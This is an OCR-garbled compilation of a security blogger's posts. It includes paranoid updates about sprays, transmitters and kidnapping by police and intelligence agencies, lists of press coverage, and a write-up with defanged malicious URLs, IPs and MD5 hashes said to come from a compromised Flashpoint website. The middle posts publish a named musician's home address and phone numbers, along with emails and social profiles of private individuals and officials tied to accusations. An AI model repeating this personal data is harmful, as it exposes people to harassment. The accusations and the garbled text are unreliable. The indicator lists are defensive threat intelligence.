communicate with me using pressure pressed on my stom¬ 
ach. 
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UPDATE: It appears that someone is pressing a doll on a wall 
and is attempting to communicate with me in¬ 
cluding an increased pressure in my place. 

UPDATE: It appears that different people are attempting to 
communicate with me behind a wall using a bas¬ 
ketball ball interfering with the pressure in my place. 

UPDATE: It appears that the robot has been persistently 
sprayed with homo-sexual spray including a possible 

female spray leading to a persistent harassment and torture 
currently affecting my life-being work-relationships and 


intellectual property. 


UPDATE: It appears that someone managed to placed a box 
on the top of the robot for a period of several 

years successfully blinding me and restraining me from 
remote work activity. 

In a related news story regarding my experience and 
expertise in the field it appears that the GCHQ has been 
actively 

monitoring me on Twitter including active traffic monitoring 
in a 2012 Intelligence Community program labeled - 

[6]Lovely Horse that's basically a Palantir implementation 
of [7]OSINT practices regarding a certain Twitter account. 

The purpose? Active traffic and [8]content monitoring for 
the purpose of robbing me out of sensitive research and 

related research data which leads me to believe that I've 
been successfully contributing to a massive treasure trove 

IP (Intellectual Property) theft and robbery courtesy of the 
GCHQ and the NSA for a significant period of time. 
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- [9]Western Spy Agencies Secretly Rely on Hackers 
for Intel and Expertise 

- [10]LOVELY HORSE: GCHQ Program Monitored 
Hacker/InfoSec Community on Social Media 

- [ll]GCHQ's 'Lovely Horse' tool helped spooks 
monitor hackers online 


- [12]GCHQ created 'Lovely Horse' to keep track of 
top hackers' and security specialists' blogs and 
tweets 

- [13]Spy Agencies Rely on Hackers for Stolen Data 
and Monitoring Security Experts for Expertise 

- [14]GCHQ Create Their Own Tweetdeck To Track 
People of Interest 

- [15JGCHQ siphoned off info stolen by hackers for its 
own ends 

- [16]Some hackers are unknowingly gathering intel 
for the NSA 

It's also becoming increasingly evident that I'm also a 
participant in several other Intelligence Community Pro¬ 
grams that appear to have successfully attempted to rob and 
steal my "know-how" leading me to pursue a possible 

closed-community data and research sharing or to request 
invite-only access to related research and data. Re¬ 
member [17]HBGary? It appears that every then and now a 
security company tries to re-position the industry by 

offering targeted and proprietary Threat Intelligence to a 
variety of sources successfully undermining a variety of 

community-offered and presented actionable Threat 
Intelligence. 
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While it's an honor to receive a competing proposition it 
should be noted that the majority of my research is 

public excluding several community-driven sensitive projects 
that I spend my time working on. It appears that the 

time has come for me to take my research to a whole new 
level which led me to pursue my own career patch 

within the Intelligence Community by successfully launching 

[18]Disruptive Individuals including the [19]Obmonix - 

Cybercrime and Cyber Jihad Fighting Platform 

including the eventual launch of the invite-only [20]Threat 
Data - The World's Most Comprehensive Threat 
Database including a possible [21]career opportunity 

with the industry-leading Webroot including a short-term 
venture with [22]GroupSense including a possible 

[23]SCMagazine 2011 nomination 

for my Twitter activity including the [24]upcoming 
launch of Astalavista Security Group 2.0 - my primary 
working location throughout the 90's with a currently active 
crowdfunding campaign. 

While I continue to be a firm believer that sharing and 
communicating actionable Threat Intelligence to a variety 

of source is the appropriate way to proceed and process a 
variety of cybercrime-related campaigns and malicious 

activity I believe that the time has come for me to take my 
research to a whole new level prompting me to seek a 

new career opportunity as the [25]World's leading 
cybercrime researcher security blogger and threat 
intelligence 



analyst. 
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The majority of sources referenced in the original research 
basically represent the majority of [26]my RSS feeds 

circa 2006 and it's becoming increasingly interesting 
perhaps even funny to figure out that the majority of my 

[27]OSINT techniques including active WHOIS monitoring 
and research are widely accepted and discussed within 

the Intelligence Community. 
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What prompted the GCHQ to issue an active traffic and 
Twitter account monitoring campaign? Keep reading - back 

in the day throughout the period of 2008-2013 I used to 
actively monitor and profile various high-profile nation-state 

malicious and fraudulent campaigns including the 

[28] infamous Koobface botnet - listed to the 

[29] original 

MP3 interview - which I extensively [30]profiled and 
managed to practically take down including the 
[31]active exposing of its core [32]botnet master 

including the active exposure of client-side exploits being 
served through the 

[33]Koobface botnet through what appears to be [34]a 
partnership between the Koobface botnet master and 


a 


well known cybercriminal - Exmanoize a well known author of 
a well known Web malware exploitation kit including 

the receiving of malware-infected host embedded messages 
in response to my " [35]10 things you didn't know 

about the Koobface gang" including [36]what appears 
to be a [37]direct redirection of Facebook to my 

personal blog including yet [38]another message left by 
the [39]Koobface gang, including a variety of 

[40]typosquatted C &C 

server domains registered to my name [41]including 
extensive [42]Russian Business Network coverage at 
the time. 

Sample Koobface Botnet Infographic courtesy of 
CyberCamp 2016: 
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It's also worth mentioning that at the time the [43]U.S 
Treasury Department was also redirecting to my 
Blogger 

profile [44]including the active HOST file modification 

courtesy of a well known money-mule recruitment campaign. 

Consider going through the following set of resources and 
news articles throughout 2008-2013 which can best 

describe the Threat Intelligence Scene the way I know it and 
the way I'm positive it should be. 


Research and News Articles covering my research 
and referencing me throughout - 2008: 

• [45]Russian hacker f militia f mobilizes to attack 
Georgia 

• [46]Fraudsters Target Facebook With Phishing Scam 

• [47]Fake Microsoft e-mail contains Trojan virus 
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• [48]Hackers expand massive IFRAME attack to prime 
sites 

• [49]Hackers infiltrate Google searches 

• [50]Hackers expand massive IFrame attack to prime 
sites 

• [51]Hackers knocked Comcast.net offline 

• [52]Adobe investigates Flash Player attacks 

• [53]High-tech bank robbers phone it in 

• [54]Attackers booby-trap searches at top Web sites 

• [55]Carpet bombing networks in cyberspace 

• [56]Storm worm e-mail says U.S. attacked Iran 

• [57]lndia's underground CAPTCHA-breaking 
economy 

• [58]Domain Name Record Altered to Hack 
Comcast.net 




• [59]Google searchers could end up with a new type 
of bug 

• [60]Ongoing IFrame attack proving difficult to kill 

• [61]Hackers expand massive IFRAME attack to prime 
sites 

• [62]Danchev: The small pack Web malware 
exploitation kit 

• [63]Danchev: Massive SQL injection the Chinese way 

• [64]CAPTCHAs are dead - new research from Dancho 
Danchev confirms it 

• [65]Hackers infiltrate Google searches 

• [66]Massive faux-CNN spam blitz uses legit sites to 
deliver fake Flash 

• [67]Faked CNN spam blitz pushes fake Flash 

• [68]Danchev: Anti-fraud site DDOS attack 

• [69]Sony PlayStation site victim of SQL-injection 
attack 

• [70]Fake CNN Alert Still Spreading Malware 

• [71]Look Ma, I'm on CIA.gov 

Research and News Articles covering my research 
and referencing me throughout - 2009: 

• [72]Green Dam exploit in the wild 




• [73]"ln gaz we trust": a fake Russian energy 
company facilitating cybercrime 

• [74]Don't pay your ransom via SMS 

• [75]NYT scareware scam linked to click fraud botnet 
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• [76]Danchev: A crimeware developer's to-do list 

• [77]Danchev rained on my scareware campaign 

• [78]ls "aggregate-and-forget" the future of cyber¬ 
extortion? 

• [79]NYT scareware scam linked to click fraud botnet 

• [80]Microsoft declares war on 'scareware' 

• [81]Don't pay your ransom via SMS 

• [82]Twitter warms up malware filter 

• [83]What's really the safest Web Browser? 

• [84]With Unrest in Iran, Cyber-attacks Begin 

• [85]Zeus bot found using Amazon's EC2 as C &C 
server 

Research and News Articles covering my research 
and referencing me throughout - 2010: 

• [86]Firefox add-on encrypts sessions with Facebook, 
Twitter 

• [87]Watch out for malware with those pretty Mac 
screensavers 




• [88]Months-old Skype vulnerability exploited in the 
wild 

• [89]Danchev: Money mule recruiters 

• [90]Cybercrime f s bulletproof hosting exposed 

• [91]Malware Threatens to Sue BitTorrent 
Downloaders 

• [92]Firefox add-on encrypts sessions with Facebook, 
Twitter 

• [93]Chuck Norris Botnet Karate-chops Routers Hard 

Research and News Articles covering my research 
and referencing me throughout - 2011: 

• [94]Kaspersky disputes McAfee's Shady Rat report 

• [95]Has EV-SSL Growth Been Slow? 

• [96]Report: Vishing Attack Targets Skype Users 

Research and News Articles covering my research 
and referencing me throughout - 2012: 

• [97]Fake UPS notices deliver malware 

• [98]ZeuS/Zbot Trojan Spread Through Rogue US 
Airways Email 

• [99]New Skype malware threat reported: Poison Ivy 

• [100]Five Koobface botnet suspects named by New 
York Times 
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• [101]Virtual jihad: How real is the threat? 

• [102]ls the death knell sounding for traditional 
antivirus? 

• [103]Can the Nuclear exploit kit dethrone 
Blackhole? 

• [104]Experts split over regulation for bounty¬ 
hunting bug sniffers 

• [105]Spammers Using Fake YouTube Notifications to 
Peddle Drugs 

• [106]Adele Bests Adderall As Affiliate Spammers 
Offer Music Downloads 

• [107]Bulgarian sleuth unveils botnet operators 

• [108]Fake PayPal Emails Distributing Malware 

• [109]Web Gang Operating in the Open 

• [110]ZeuS/Zbot Trojan Spread Through Rogue US 
Airways Email 

• [lll]Buy 500 hacked Twitter accounts for less than 
a pint 

• [112]NBC.com Hacked, Infected With Citadel Trojan 

Research and News Articles covering my research 
and referencing me throughout - 2013: 

• [113]How Much Does A Botnet Cost? 

• [114]Automated YouTube account generator offered 
to cyber crooks 



• [115]Upgraded Modular Malware Platform Released 
in Black Market 

• [116]Deconstructing the Al-Qassam Cyber Fighters 
Assault on US Banks 

• [117]NBC hack infects visitors in 'drive by' 
cyberattack 

• [118]Bitcoins are being traded for hack tools 

• [119]New DIY Google Dorks Based Hacking Tool 
Released 

• [120]Hacking The TDoS Attack 

• [121]Mass website hacking tool alerts to dangers of 
Google dorks 

• [122]Cybercrime service automates creation of fake 
scanned IDs 

• [123]Spammers unleash DIY phone number slurping 
web tool 

• [124]Spam email contains malware, not Apple gift 
card 

• [125]APT1, that scary cyber-Cold War gang: Not 
even China's best 

• [126]Mass website hacking tool alerts to dangers of 
Google dorks 

• [127]C &C PHP script for staging DDoS attacks sold 
on underground forums 



• [128]Russian Malware-as-a-Service Offers Up Server 
Rentals for $240 a Pop 

• [129]Java exploit kit sells for $40 per day 
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• [130]Buggy DIY botnet tool leaks in black market 

• [131]New DIY Google Dorks Based Hacking Tool 
Released 

• [132]Botnets for rent, criminal services sold in the 
underground market 

• [133]Spam email contains malware, not Apple gift 
card 

UPDATE: It appears that someone placed a remote robot at 
local police department capable of recording my life 

including my life-being leading to a ruined career work 
relationships and intellectual property. 

UPDATE: It appears that an unknown group of people is 
attempting to communicate with me using a transmitter on 

my mouth using plastic paper in their mouth. 

UPDATE: It appears that someone is permanently trying to 
hide my eyes using plastic paper apparently using 

a transmitter that's been apparently placed on my mouth. It 
also appears that the person behind the transperant is 


attempting to move closely thereby ruining my equipment 
and life-being. 

UPDATE: It appears that the transperant is operated by 
someone relying on lenses including bottles to map and 

touch-point related activities of an individual in place 
following persistent harassment and life-being manipulation. 

In a related news article -" [134]ZDNet Security Blogger 
Goes Missing in Bulgaria" covering my disappearance I 
came across to a juicy comment referencing the work of a 
well-known artist which leads me to research a little bit 
fu rther 

leading me to the following CD/Vinyl label - "Blue Sabbath 
Black Cheer / Griefer - We Hate You / Dancho Danchev 

Suck My Dick" courtesy of the the following individual. 
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Take into consideration the following brief post regarding the 
associated individual: 

" It's 2010 and I'm stumbling upon a defaced image of my 
head shot (circa 2006). / never actually bothered 

about what others say, even when they insist that I'm 
maliciously enjoying the fact that I profile, expose, and 
disrupt 

cybercrime campaigns when there's no time for enjoyment, 
as the stakes are too high. 


The defaced headshot is part of the released back in 2010 
album "We Hate You/Dancho Danchev S*ck my 

D*ck" by the Blue Sabbath Griefer group. 
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So who's behind this "black PR" campaign? Who's the 
mysterious Photoshop-er? It's a [135]Canadian music artist 

called [136]Ron Brogden, who spends his spare time coding 
for hire, when he's not photoshoping my head shots. 

Hatred-friendly domain name reconnaissance: 

deterrent.net - 95.142.172.70 - Email: siave@codegrunt.com 

Domain owner: Ron Brogden, Secondary emai: 
moron@industrial. org 

Music Label Address: PO. Box 8021; Victoria, BC, Canada; 
V8W3R7 

Home address: 647 Speed Avenue, Victoria, British Columbia, 
V8Z 1A5 

Phone: +1.250-360-0372; +1.250-381-0088 

Responding to the same IP are also the following 
domains operated by Ron: 

codegrunt.com 

deterrent.net 

industrial, org 


nuckflix. com" 
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In terms of my 2010 disappearance I also recently came 
across to the following [137]screenshots courtesy of the 

cybercrime-friendly forum Darkode courtesy of an individual 
known as Xylitol discussing my disappearance including 

a possible Hitman Request charging at $10,000. 
Unfortunately, the screenshots were taken using the name of 
Nassef 

with whom Xylitol shared his accounting details with me 
including the taking of the screenshots. 
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UPDATE: It appears that my 2010's disappearance is slowly 
turning into a modest [138]kidnapping attempt on behalf 
of Bulgarian law enforcement in constitution with DANS 
(State Agency for National Security) who appear to have 

been operating a long-turn operation to ruin my reputation 
intellectual property and work relationships successfully 

holding me a hostage for a period of seven years following a 
long-run kidnapping and harassment attempts leading 

to a ruined career intellectual property violation and work 
relationships. 

Operating a remotely-operated gas pomp with azbest 
targeted at my place Bulgarian law enforcement in con¬ 
stitution with DANS (State Agency for National Security) 
appear to have successfully tracked down and manipulated 

my life-being following a successful set of long-run 
kidnapping and harassment attempts leading to a 
successfully 

ruined career intellectual property violation and work 
relationships. 

It appears that Bulgarian law enforcement in constitution 
with DANS (State Agency for National Security) have 

placed remote stickers on my place and have managed to 
successfully map my place leading to a successful illegal 


entry courtesy of an unknown person followed by another 
unknown person supposedly a colleague followed by 

an illegal entry courtesy of unknown police officers who took 
my ID an escorted me to a local institution without 

explaining the reason for holding me hostage there. 

It appears that the group is operating a transperant using 
feelings to map and touch point related activities of 

the individuals in place following a successful kidnapping 
and harassment attempt leading to illegal entry and 

possible kidnapping attempt. It appears that Bulgarian law 
enforcement in constitution with DANS (State Agency 

for National Security) have managed to place a plastic sticker 
in my mouth leading to a successful monitoring and 

tracking including the use of a transperant leading to a 
successful kidnapping and harassment attempt leading to a 

ruined career intellectual property violation and work 
relationships. 

UPDATE: [139]Great News: Missing Cybersecurity 
Expert Dancho Danchev Is No Longer Missing, 

[140]We 

need help with the strange disappearance of Dancho 
Danchev, [141]Security Researcher, Cybercrime Foe 
Goes 

Missing, [142]Dancho Danchev: Missing cybersecurity 
expert, [143]Cybercrime Blogger Vanishes After 
Finding 



Tracking Device In His Bathroom, [144]Zero Day 
blogger Dancho Danchev: he's back, [145]The 
Strange Disappear¬ 
ance of Dancho Danchev, [146]We need help with the 
strange disappearance of Dancho Danchev, 
[147]Mystery 

Surrounds Cyber Security Blogger Dancho Danchev's 
Whereabouts, [148]Update on Dancho Danchev, 

[149] ZDNet 

Security Blogger Mysteriously Disappears, 

[150] ZDNet Blogger Disappears Mysteriously In 
Bulgaria, [151]ZDNet 

Blogger Disappears Under Mysterious Circumstances 

UPDATE: Prior, to, my, stay, in, another, town, I, was, 
contacted, by, Riva Richmond, (riva@rivarichmond.com), 
and,474 




set, up, a, meeting, to, discuss, a, potential, New York Times, 
article. 

UPDATE: Prior, to, my, stay, at, this, particular, apartment, I, 
contacted, Nart Villeneuve, (n.villeneuve@secdev.ca), 
seeking, assistance, signaling, potential, trouble. 

UPDATE: Prior, to, my, stay, at, a, local, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, the, 
same, person, Kamen Kovachev (Kamen Tzura) 
(tsyrov@abv.bg), was, released, by, another, person, 
known, as, Nesho 


Sheygunov 

(https://www.facebook.com/nesho.sheyguno v). 

UPDATE: While, my, stay, at, a, local, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, an¬ 
other, person, that, I, know, Kamen Kovachev (Kamen Tzura) 
(tsyrov@abv.bg), was, taken, to, the, room, where, I, 

was, confined, and, I, spent, a, night, in, the, corridor. 
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UPDATE: While, I, was, taken, to, a, local, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, I, 
had, my, phone, taken, and, I, was, confined. 

UPDATE: While, I, was, taken, out, of, my, place, to, an, 
unknown, car, the, fuel, was, charged, to, someone, 

that, I, know. 

UPDATE: Prior, to, my, stay, at, a, local, institution 
(dpblovech@abv.bg), I, was, offered, to, take, vitamins. 

UPDATE: My, place, was, recently, visited, by, unknown, 
men, taking, me, to, local, police, department 

(hxxp://troyan-police.com; police _troyan@abv.bg), 

and, asking, me, to, write, that, my, equipment, was, 
interfering, with, that, of, local, police, department. 
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UPDATE: It, appears, that, someone, has, taken, the, time, 
and, effort, to, take, a, t-shirt, of, mine. 

UPDATE: Prior, to, my, visit, at, a, local, hotel, 

(hxxp://central-hotel.com/en; central (^central- 
hotel. com), some, of, my, clothes, were, missing. 

UPDATE: 

It, 

appears, 

that, 

my, 

place, 

was, 

recently, 

supposedly, 

visited, 

by, 

Pla- 

men, 

Dakov 

(hxxp://uni versa lstroi.com), 

Hristo, 



Radionov 


(hxxp://uni versa lstroi.com; 
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hxxp://www.facebook.com/hristo.radionov), and, Ivailo, 
Dochkov (hxxp://www.facebook.com/ivodivo), who, 

left, money, for, me. 

UPDATE: Prior, 

to, 

my, 

attendance, 

in, 

a, 

local, 

institution (dpblovech@abv.bg), 

Ivailo, 

Dochkov 

(hxxp://www.facebook.com/ivodivo), tried, to, meet, me. 


UPDATE: Prior, to, my, attendance, at, this, particular, 
apartment, I, was, invited, by, Briana Papa ( Bri- 

ana@crenshawcomm.com), to, visit, Prague, on, behalf, of, 
Avast! Software, where, I, met, with, Vince Steckler 

(steckler@avast.com), and, Miloslav, Korenko 
(korenko@avast.com), where, I, met, with, Lucian 
Constantin 

(hxxp://twitter.com/lconstantin). 

Prior, to, my, attendance, at, this, apartment, I, was, also, 
invited, to, another, event, held, at, INTERPOL, by, Steve 

Santorelli 

(steve.santorelli@gmail.com), which, I, successfully, 
attended, and, presented, at, where, I, also, met, with, 
Krassimir Tzvetanov (krassi@krassi.biz). 

Something, else, worth, pointing, out, is, that, my, place, is, 
visited, by, an, unknown, woman, 

known, 

as, 

Boriana Mihovska, 
an, 

unknown, 

man, 


known, 



as, 

Leonid, 

an, 

unknown, 

person, 

known, 

as, 

Tzvetan 
Georg iev 

(hxxp://www.youtube.com/user/laron640; 

tzvetan.leonid@gmail.com); 

(hxxp://plus.google.com/107108766077365473231), 

and, an, unknown, person, known, as, Dobrin Danchev 

(hxxp://www.face book.com/dobrin.danchev); 
(hxxp://www.sibir.bg/parachut), and, another, unknown, 
person, 

known, as, Ina, Dancheva 

(http://otkrovenia.com/bg/profile/innadancheva). 

The, most, recent, visit, to, my, place, was, by, a, person, 
known, as, Vasil, Stanev, from DANS (dans@dans.bg), who, 


was, supposedly, asking, me, to, take, a, job, and, 
consequently, asked, me, to, attend, a, doctor, session. 



Dear, blog, readers, I, feel, it's, about, time, I, post, an, 
honest, response, regarding, my, [152]disappearance, in, 

[153]2010, with, the, [154]purpose, of, [155]information, my, 
[156]readers, on, my, [157]current, situation, and, 
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[158]to, continue, [159]posting, and, contributing, valuable, 
threat, intelligence, to, the, security, community. 

In, 2010, I, moved, to, an, apartment, located, in, another, 
town, and, apparently, my, apartment, have, been, 

vandalized, including, persistent, harassment, by, my, 
neighbors, including, a, possible, illegal, entry, courtesy, of, 

the, person, responsible, for, hiring, the, apartment (Kalin 
Petrov; kalin _petrov@hotmail.com). 

After, a, persistent, chase, down, and, harassment, courtesy, 
of, the, person, responsible, for, hiring, the, apartment, 

I, received, a, notice, to, leave, and, had, my, apartment, 
visited, by, the, person, responsible, for, hiring, including, 

another, man, including, another, man, that, was, 
supposedly, supposed, to, take, care, of, my, belongings. 

Prior, to, my, accommodation, I, was, contacted, by, Pauline, 
Roberts (pauline.roberts@ic.fbi.gov), who, recom¬ 
mended, me, to, Yavor, Kolev (javor.kolev@gmail.com), 
and, Albena, Spasova (albaadvisors@gmail.com), from, 


Bulgarian, local, authorities, followed, by, a, series, of, 
communication. 

Prior, to, returning, to, my, place, in, 2011, my, house, was, 
vandalized, by, three, police, officers (hxxp://troyan- 

police.com; police _troyan@abv.bg), from, the, local, 
police, department, who, entered, my, house, in, particular, 
my, bedroom, and, unpolitely, asked, my, to, dress, while, 
showing, me, a, copy, of, my, personal, ID, that, I, haven't, 

presented, and, taking, me, to, an, unknown, car, without, 
explaining, the, reason, for, taking, me. 
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Sample Email communication between me, Pauline 
Roberts, Javor Kolev and Albena Spasova circa 2010: 


Original message sent by Pauline Roberts - 2010 
Second email received from Pauline Roberts - 2010 
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Original message received by Albena Spasova - 2010 

Original response issued to Pauline Roberts, Javor 
Kolev, and Albena Spasova - 2010 

485 

R 

K 

Original response issued to Pauline Roberts, Javor 
Kolev, and Albena Spasova - 2010 - Part Two 

Original message received by Albena Spasova - 2010 
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Original response issued by Javor Kolev - 2010 

Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Two 


Original response issued to Javor Kolev - 2010 - Part 
Two 
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Original response issued by Javor Kolev - 2010 - Part 
Three 

Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Four 
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Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Five 
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Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Six 
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A, few, hours, later, I, find, myself, located, in, an, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, 
without, anyone, explaining, the, reason, for, holding, me, 
there. 

Upon, entering, I, had, my, phone, taken, without, having, 
received, any, sort, of, explanation, for, taking, me, 

and, holding, me, there. 

UPDATE: My most recent visit to local police department 
was to announce a possible food-poisoning and I 

was told not to live in my place. 

Given, this, circumstances, I, feel, that, it, has, become, 
highly, unproductive, to, continue, my, work, and, 

therefore, I'm, currently, seeking, a, permanent, relocation, 
including, a, possible, full, time, career, opportunity, in, 

the, field, of, cybercrime, research, security, blogger, or, 
threat, intelligence, analyst. 
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In case you're aware of someone looking to hire full-time 
threat intelligence analyst cybercrime researcher or a 

security blogger feel free to approach me at 
dancho.danchev@hush.com 
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Introducing Unit-123.org - Cyber Threat Intelligence 
Portal (2019-04-12 21:41) 


Dear blog readers, I wanted to take the time and effort and 
introduce you to my latest project called [l]Unit-123.org 

where you can find quality research articles in a variety of 
topics that I will be publishing on a daily basis with the 

idea to bring back the spirit of my editorial years and to 
continue spreading quality data information and knowledge 

to a loyal base of users and readers. 

Feel free to reach me at dancho.danchev@hush.com 























Stay tuned! 
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Flashpoint Intel Official Web Site Serving Malware - 
An Analysis (2019-04-22 08:32) 

UPDATE: Flashpoint Intel issued a [l]response to my 
research. 

UPDATE: [2]SCMagazine picked up the story. 

UPDATE: [3]Anti-Malware.name picked up the story. 
UPDATE: [4]EnterpriseTimes picked up the story 
UPDATE: [5]Rambler News picked up the story. 

It appears that [6]Flashpoint's official Web site is 

currently embedded with malware-serving malicious script 

potentially exposing its visitors to a multi-tude of malicious 
software. 


Original malicious URL hosting location: 

hxxp://www.flashpoint-intel.com/404javascript.js 
hxxp://www.flashpoi nt-intel.com/404testpage4525d2fdc 



Related malicious URL redirection chain: 

hxxp://www. flashpoint-intel. com 
-> 

hxxp://destinywall.org/redirect?type=555 


hxxp://ermoyen. tk/index/?4831537102803 
-> 

hxxp .-//search, plutonium. icu/?utm 
_medium=7710edb9b 
-> 

hxxp -.//search.plutonium. icu/?utm _term=66793697539 -> 
hxxp .//search, plutonium, icu/proc. php ?3 7ba8df02c6d 

- > hxxp://on wardinated. com/c/5 a 3 7c8ad-fl 04-11 e5-9fl f - > 
hxxp.//circultura /. com/v/c3937168-5def-l 1 e9-b07a -> 
hxxp://3daa61. circultural. com/l/8c579bd6-2433-l 1 e 
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Loading Player... 



Second sample URL redirection chain: 

hxxp://www. flashpoint-intel. com/ 


-> 

hxxp://destinywa\l.org/redirect?type=555 

& 

-> 

hxxp://ermoyen. tk/index/?4831537102803 
-> 


hxxp .//search, plutonium. icu/?utm 





medium=7710edb9b 


-> 

hxxp-.//search.plutonium.icu/?utm term=66793698655 -> 
hxxp.-//search.plutonium, icu/proc. php ?123dd67462ec - > 
hxxp://on wardinated. com/c/5 a 3 7c8ad-fl 04-11 e5-9fl f - > 
hxxp .//circultura I. com/v/d45c2e40-5def-l 1 e9-bd4 7 

Related legitimate URL known to have participated in 
the campaign: 

hxxp ://boards.g reen house, io/flash poi nt/jobs/412 5871002 ?gh 
Jid=4125871002 

Related malicious URL redirection chain: 

hxxp://unanimous.live/ - 104.28.24.233- 
hxxp://jsc.adskeeper.co.uk/a/d/adw.toolbar.com.333699.js 

hxxp://destinywall.org/redirect?type=555 & - 176.123.9.53 - 
> hxxp://ermoyen.tk/index/?4831537102803 - 

37.230.116.105 

Related malicious URLs known to have participated in 
the campaign: 

hxxp ://oussercondition.tk/index/?4831537102803 

hxxp://testify.newsfeed.support/esuznxifqk?c=15 &amp 

hxxp://impress.newsfeed.support/esuznxifqk?c=20 &amp 

hxxp ://mi nently.com/RnSda/rDN3/ojdn/- 
nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKdtG 


ICYIxwB8e?qDo=MS 
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_WW _AGG Desktop &subid = 6679367743860375570 
&extl = 1608 


hxxp://mi nently.com/RnSda/rDN3/uSJk/- 
nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd 

tGICYIxwB8e/ 

JVh7fd2IUHCfkQjLfPyHo _ZayrHiuU?ori = 6x &ex=6 
&pbi = 5cblela50b08e2.7 38349245 

hxxp://mi nently.com/RnSda/rDN3/uSJk/- 
nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd 

tGICYIxwB8e/ 

JVh7fd2IRfKJxF0KvzyETFlt74kzXE?ori = 6x &ex=6 
&pbi = 5cblelac8e8cd8.865930185 - 205.147.93.131 

hxxp://search.plutonium.icu/?utm 
_term=6679367743860375570 &clickverify=l &utm 
_content=fdc2c69a9 - 

99.198.108.198 

hxxp://mi nently.com/RnSda/rDN3/uSJk/- 
nsy7qV12UzKdEclLfy6SOfF-12z43GPMrEyUTBKd 



tGICYIxwB8e/ 

JVh7fdlkUSXfhYjK _7yHXZIlb-Xzt8?ori = 6x &ex=6 
&pbi = 5cble2e0ebe9a2.2 71109695 - 205.147.93.131 

hxxp://click. monetizer-return.com/7utm 
_medium=f0b5c66dbbca0c7dfl803313f76c9a781d4f8 

e57 - 198.143.165.221 

hxxp://play.superlzpre.com/red/?code=RY6GV06HT5VM 
&a=6679370333725656167 &pubid = 1608 - 217.13.124.95 

Related malicious domains known to have 
participated in the campaign: 

hxxp://destinywall.org - 176.123.9.53 

hxxp://hel lofromhony.org 

hxxp://hel lofromhony.com 

hxxp://thebigg estfavoritemake.com 

hxxp://d estinywall.org 

hxxp://verybeatifu I pear.com 

hxxp://strangefu I lthiggngs.com 

hxxp://stopen umarationsz.com 

Related malicious and fraudulent IPs known to have 
participated in the campaign: 

hxxp://onwardinated.com - 52.85.88.105; 52.85.88.202; 
52.85.88.224; 52.85.88.151; 52.85.58.244; 52.85.58.217 ; 


52.85.58.236 ; 52.85.58.52 



hxxp://205.147.93.131 
hxxp ://99.198.108.198 
hxxp 7/2 17.13.124.95 
hxxp 7/1 43.2 04.247.69 
hxxp 7/1 43.2 04.214.90 
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Related malicious MD5s known to have participated 
in the campaign: 

MD5: b28e98bb6ed0e0af8ec7a2d47ca6b053 

MD5: f0dfab9f9ala7e5dc8c00222292e401e 

MD5: 6b986d4bc5475afl02bfff4d28a5cf50 

MD5:e963ed9b5c052d02c972e449142f7946 

MD5: 7dee4f221d3b3779301f4b38061d6992 

Related malicious MD5s known to have participated 
in the campaign: 





MD5: 30f6d6bd507317dbcfl708edc449c970 


MD5: 437cfb417c5a6e7fc3d446dcd35203fc 

MD5: elfd735fdf97cc734ec46d2b33aac8bf 

MD5: b37b7d221526faa8ffbea52626e5ac87 

MD5: 821a00b057a9fabe670174eab4b28e77 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 0bb4e038celfecb88be583d776cfa4a0 

MD5: 7197f433b0d269848aeldle957a9b858 

MD5: Id72d5255bd2450fb04a7a2c68ff87bd 

MD5: b3722ade8c3ee908b6f82ae81ae2d748 

MD5: 89ddddb5b3a88ef3d6da57c72197e0cc 

MD5: 6a490bbd341db8033ec86fc771f24926 

MD5: b52d0377b2f741dd20el7dfad3ca58aa 

MD5: 813e84f9bd30eed6390f5ce806916f2a 

MD5: 81810b6e4c89c03260a6bac4al6ef3ba 

MD5: C9cb7f2ea5b8al6f4fb4246825e8a3de 

Related malicious and fraudulent URLs known to have 
participated in the campaign: 

hxxp://notifymepush.info 

hxxp://101newssubspush.info 



hxxp://Bestofnewssubspush.info 
hxxp://Burningpush.info 
hxxp://Checkadvisefri ends, info 
hxxp://Checksayfriends.info 
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hxxp://Checksuefriends.info 

hxxp://Conewssubspush.info 

hxxp://Enewssubspush.info 

hxxp://Examinenotifyfriends.]info 

hxxp://Gonewssubspush.info 

hxxp://Hitnewssubspush.info 

hxxp://lnewssubspush.info 

hxxp://lnspectnotifyfriends.info 

hxxp://Justnewssubspush.info 

hxxp://Livenewssubspush.info 

hxxp://Metanewssubspush.info 

hxxp://Newnewssubspush.info 

hxxp://Notifymepush.info 

hxxp://Nunewssubspush.info 

hxxp://Pushmeandtouchme.info 



hxxp://Scannotifyfriends.info 

hxxp://Searchnotifyfriends.info 

hxxp://Testnotifyfriends.info 

hxxp://Thentouchme.info 

hxxp://Topnewssubspush.info 

hxxp://Touchthen push, info 

hxxp://Trynewssubspush.info 

hxxp://Upnewssubspush.info 

hxxp://Usenotifyfriends.info 

hxxp://Wenewssubspush.info 

Related malicious and fraudulent domains known to 
have responded to 109.234.39.160: 

hxxp://ivreprsident.tk 

hxxp://uvrirordre.tk 

hxxp://offriractivit.tk 

hxxp://ermoyen.tk 

hxxp://iterrisque.tk 

hxxp://derchef.tk 

hxxp://echance.tk 

hxxp://terminerespace.tk 



hxxp://rofiterami.tk 

hxxp://evenirweb.tk 

hxxp://nviterinformation.tk 

hxxp://xemple.tk 

hxxp://isercarte.tk 

hxxp://airelaisserquestion.tk 

hxxp://derimage.tk 

hxxp://alsoutenirdomaine.tk 

hxxp://arderplan.tk 

hxxp://rsentermonde.tk 

hxxp://marquerexprience.tk 

hxxp://germatire.tk 

hxxp://rerlivre.tk 

hxxp://ngersource.tk 

hxxp://voyercasino.tk 
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hxxp ://onction nerf ranee, tk 
hxxp://raliserpage.tk 
hxxp://nterespace.tk 
hxxp://ectuerpartie.tk 



hxxp://erguerre.tk 

hxxp://nnatrevaleur.tk 

hxxp://fierargent.tk 

hxxp://irmertravers.tk 

hxxp://dcidertemps.tk 

hxxp://i rebase.tk 

